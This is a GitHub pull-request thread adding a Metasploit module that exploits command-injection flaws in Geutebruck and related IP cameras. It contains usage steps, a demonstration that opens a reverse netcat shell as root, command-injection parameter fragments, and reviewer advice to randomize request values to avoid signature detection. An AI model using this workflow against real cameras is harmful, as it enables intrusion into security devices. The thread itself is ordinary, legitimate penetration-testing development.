Add Geutebruck CVE_2021_335XX command injection module
rapid7/metasploit-framework pull request #15603
Opened 2021-08-26 23:57 UTC by TrGFxX

This module bypasses authentication and exploits multiple authenticated arbitrary command execution vulnerabilities : 
- CVE-2021-33544
- CVE-2021-33548
- CVE-2021-33550
- CVE-2021-33551
- CVE-2021-33552
- CVE-2021-33553
- CVE-2021-33554 

within various parameters of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. 
Successful exploitation results in remote code execution as the `root` user.

Many brands use the same firmware:
  * UDP Technology (which is also the supplier of the firmware for the other vendors)
  * Ganz
  * Visualint
  * Cap
  * THRIVE Intelligence
  * Sophus
  * VCA
  * TripCorps
  * Sprinx Technologies
  * Smartec
  * Riva
 
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 and the blogpost about the issue : https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.

This module consolidates #15482, #15483, #15484, #15485, #15481, #15487 & #15486  as @jmartin-r7 requested :) .

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx`
- [ ] `set lhost <metasploit_ip>`
- [ ] `set rhosts <camera_ip>`
- [ ] `check` to be sure the target is vulnerable
- [ ] `exploit`
- [ ] You should get a shell

## Demonstration
### Exploitation 
```
msf6 > use exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > exploit

[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Attempting to exploit...
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2021-02-23 13:37:28 +0200
pwd

/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-g3532e87a #1 PREEMPT Tue May 12 18:00:46 KST 2020 armv5tejl GNU/Linux
```

2021-08-30 09:43 UTC, TrGFxX commented
> Hello @TrGFxX could you please send an updated set of PCAPs utilizing this module to msfdev AT metasploit.com? I believe we have PCAPs for some of 2 of the exploits in this set but not the rest.
> 
> Additionally if you have any videos of this working please feel free to also send them along. We won't presently have these devices in our lab but we would be happy to land this if we have PCAPs of the module working and optionally any videos that you have showing the module working.

Hello @gwillcox-r7, @ddouhine just sent an email with the requested PCAP and the video.

2021-08-30 14:57 UTC, gwillcox-r7 commented
@TrGFxX Doing one last check of the exploit code just to make sure there is nothing else that might be of concern, and if all looks good I'll check the PCAPs that you sent over (got them in my inbox) and will double check everything looks right there, then will land this.

2021-08-30 15:44 UTC, gwillcox-r7 commented
Alright from code review looks like there are some areas of concern, however for now I'm going to upload a slightly modified version of the code as the first issue I wanted to address is overly long lines that make it hard for reviewers to see whats going on in your code. As a general rule of thumb we want lines to be under 160 characters in length if possible, and I'd even go as far as to say 120 characters or less is ideal.

This helps ensure readability and helps users who might have smaller screens review your code easier and understand it faster.

I also updated the output of the code a little bit as the way you had it before it would print out a message at the start and then if it crashed later on there would be the potential for nothing to be output, so the user would have no way of telling if the code worked or not. The new code provides more status updates to the end user to let them know what is going on.

2021-08-30 16:24 UTC, gwillcox-r7 requested changes

2021-08-30 16:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +                'type' => 'a'
Can all of these `a`'s and `1`'s be replaced with something more random? If so we could use `Rex::Text.rand_text_alphanumeric(10..16)` here instead to insert a random string instead. We do this to avoid signature detection as otherwise its pretty easy to tell this isn't a standard request.

2021-08-30 16:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +                'timekey' => '2333',
Again is `2333` a required value or could we use `Rex::Text.rand_text_numeric(4..6)` here or something similar?

2021-08-30 16:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +              'http_vars' => { 'appfile.filename' => '2.zip$(PLACEHOLDER_CMD)' },
Is `2.zip` a required string or can we randomize this?

2021-08-30 16:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +              'http_vars' => { 'preserve' => 'test$(PLACEHOLDER_CMD)' },
Is `test` a required string or can we randomize this string?

2021-08-30 16:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return true
This....is problematic. Whilst you would ensure that your parsing a response from the server, there is no guarentee that the server returned an XML response at this point. All you know is that it returned a response period. The `get_xml_document` call simply takes the body of the response, which for all we know could be empty as we haven't checked it, and tries to create an object of type `Nokogiri::XML::Document` as shown below

https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/rex/proto/http/response.rb#L115-L117

Also note that when searching for `//firmware`, we could also have a server return an XML document that is still valid but doesn't contain this string at all. Yet the code here never takes this into account and always assumes the server will return a valid XML document containing this string, which may not be the case.

2021-08-31 09:21 UTC, TrGFxX commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return true
> This....is problematic. Whilst you would ensure that your parsing a response from the server, there is no guarentee that the server returned an XML response at this point. All you know is that it returned a response period. The `get_xml_document` call simply takes the body of the response, which for all we know could be empty as we haven't checked it, and tries to create an object of type `Nokogiri::XML::Document` as shown below
> 
> https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/rex/proto/http/response.rb#L115-L117
> 
> Also note that when searching for `//firmware`, we could also have a server return an XML document that is still valid but doesn't contain this string at all. Yet the code here never takes this into account and always assumes the server will return a valid XML document containing this string, which may not be the case.

Hello @gwillcox-r7, okay we fixed the randomization for the different values mentioned above.
For this quoted issue, what would you suggest exactly?

2021-08-31 22:36 UTC, gwillcox-r7 requested changes

2021-08-31 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +                'country' => Rex::Text.rand_text_alphanumeric(2..2),
```suggestion
                'country' => Rex::Text.rand_text_alphanumeric(2),
```

This is a range that goes from 2 characters to.....umm....2 characters? You'd be better off doing ` Rex::Text.rand_text_alphanumeric(2)` here if this was your intention.

2021-08-31 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return true
So basically you want to check a number of different things here, in the following order:

1. Check `res.body` isn't empty. If it is, then it doesn't matter what `get_xml_document` returns, your going to be operating on empty data at the end of the day so everything from there on out will be invalid.
2. Check that `res_xml.at('//firmware')` actually returns a result. If it doesn't then throw an error that you couldn't find any entries and that the server's response was unexpected. You'll likely want to use something like `fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected firmware data in its response!')`
3. Only after checking that's valid will you then want to call `.text` on it and even after that you may still want to make sure you get valid text that conforms to a version string and not something like `asdf` for the version information, otherwise your code is going to error out. This will likely require a regex check.
4. At this point you have now appropriately validated things and can save the version into `@version`

2021-08-31 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return true
```suggestion
    @version = res_xml.at('//firmware').text
```

We did talk about implicit returns here. This isn't needed. Furthermore Ruby will use the last assignment as the return value if no return value is specified.

2021-08-31 22:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return result unless result == true
```suggestion
    return CheckCode::Unknown('Couldn't retrieve target version information!') unless result == true
```
So this may seem like a nice idea, however the `check` method expects a `CheckCode::XXX` result to be returned. Returning `false` is not valid and will cause the module to fail with a stack trace. Don't do this.

2021-08-31 22:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return true
An example of what I mean can be seen here:

```
>> Nokogiri::XML('').at('//test').text
Traceback (most recent call last):
	26: from ./msfconsole:23:in `<main>'
	25: from /home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
	24: from /home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
	23: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
	22: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:498:in `run_single'
	21: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:498:in `each'
	20: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `block in run_single'
	19: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:555:in `run_command'
	18: from /home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/developer.rb:113:in `cmd_irb'
	17: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:49:in `with_context'
	16: from /home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/developer.rb:117:in `block in cmd_irb'
	15: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'
	14: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'
	13: from /home/gwillcox/git/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
(irb):32:in `<main>': undefined method `text' for nil:NilClass (NoMethodError)
>> 
```

2021-08-31 23:17 UTC, gwillcox-r7 commented
Alright going to upload changes that should fix all of the above issues now, one sec.

2021-08-31 23:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return result unless result == true
Fixed in https://github.com/rapid7/metasploit-framework/pull/15603/commits/c24f03628e5e4bbfcd78cca9f8d0da4e339e177b

2021-08-31 23:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +                'country' => Rex::Text.rand_text_alphanumeric(2..2),
Fixed in https://github.com/rapid7/metasploit-framework/pull/15603/commits/c24f03628e5e4bbfcd78cca9f8d0da4e339e177b

2021-08-31 23:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
> +    return true
Fixed in https://github.com/rapid7/metasploit-framework/pull/15603/commits/c24f03628e5e4bbfcd78cca9f8d0da4e339e177b

2021-08-31 23:27 UTC, gwillcox-r7 commented
Rebasing just to squash some changes as this should be ready to land once it gets tested again. Sorry for all the confusion, but we did need to fix those issues before this got landed.

2021-09-01 01:45 UTC, gwillcox-r7 approved these changes

2021-09-01 01:46 UTC, gwillcox-r7 commented
@TrGFxX If you can just let me know if the updated changes work for you, I'll check the PCAP and this should be good to go.

2021-09-01 11:19 UTC, TrGFxX reviewed
Hello @gwillcox-r7, after testing the new changes the module throws this error : 
```
msf6 exploit(linux/http/geutebruck_cmdinject) > exploit

[*] Started reverse TCP handler on 192.168.1.54:4444
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit failed: NameError uninitialized constant Rex::Version
[*] Exploit completed, but no session was created.
```

2021-09-01 14:21 UTC, gwillcox-r7 commented
> Hello @gwillcox-r7, after testing the new changes , all of them seems to be working except this one :
> 
> ```
> [-] Exploit failed: NameError uninitialized constant Rex::Version
> ```

Hmm so I'm actually quite confused by this as we are only calling `Rex::Version.new(` which if one looks at other modules (see https://github.com/rapid7/metasploit-framework/search?q=Rex%3A%3AVersion.new%28), is pretty standard practice. 

I also did another test again with the following code and this worked fine:

```
def check
    version = Rex::Version.new('1.3.2.3')
    p version
    version = firmware
    if version == false
      return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
    end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end
```

```
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > check
#<Rex::Version "1.3.2.3">

[-] Target did not respond with a XML document containing the "firmware" element!
[*] 127.0.0.1:80 - Cannot reliably check exploitability. Target did not respond with a valid XML response that we could retrieve the version from!
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > 
```

Its possible you may need to run `bundle install` again and get your Gems updated first? Thats the only other thing I can think of as I can't replicate your issue on my side.

2021-09-01 14:47 UTC, TrGFxX commented
@gwillcox-r7 Yep after a small update it works fine now

![Screenshot 2021-09-01 at 16 45 44](https://user-images.githubusercontent.com/59778708/131692763-b962ef45-4e00-4b76-9f52-e11ce5f99a3d.jpeg)

2021-09-01 15:59 UTC, TrGFxX commented
> PCAP looks good along with the video you sent. Will merge this in now, thanks for all the work on this!

Great! Thanks for your assistance :D!

2021-09-01 16:00 UTC, merged

2021-09-01 17:07 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added which bypasses authentication and exploits CVE-2021-33544, CVE-2021-33548, and CVE-2021-33550-33554 on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the `root` user.